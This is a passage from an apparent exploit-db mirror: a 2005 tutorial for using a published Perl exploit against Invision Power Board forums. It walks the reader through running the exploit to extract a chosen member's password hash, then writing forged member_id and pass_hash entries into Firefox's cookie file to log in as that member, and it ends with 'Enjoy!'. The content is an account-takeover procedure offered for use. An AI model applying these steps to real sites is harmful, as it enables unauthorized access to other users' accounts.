bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/1014.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

# danica jones <danica6699@gmail.com>
Tutorial for the recent exploit released by Petey Beege.
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
a. perl -MCPAN -e 'shell'
b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id
ex. inv.pl http://forums.example.com 2 2
Where 2 is the login id and 2 for version 2 of IPB.
4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at
C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"
Add the following entries:
forums.example.com FALSE / FALSE 1148708747 member_id 1
forums.example.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c
Notice the value of member_id and pass_hash taken from the values
generated by the exploit.
5. Fire up Mozilla Firefox and login to http://forums.example.com
Enjoy!
# milw0rm.com [2005-05-27]
Reference in a new issue View git blame Copy permalink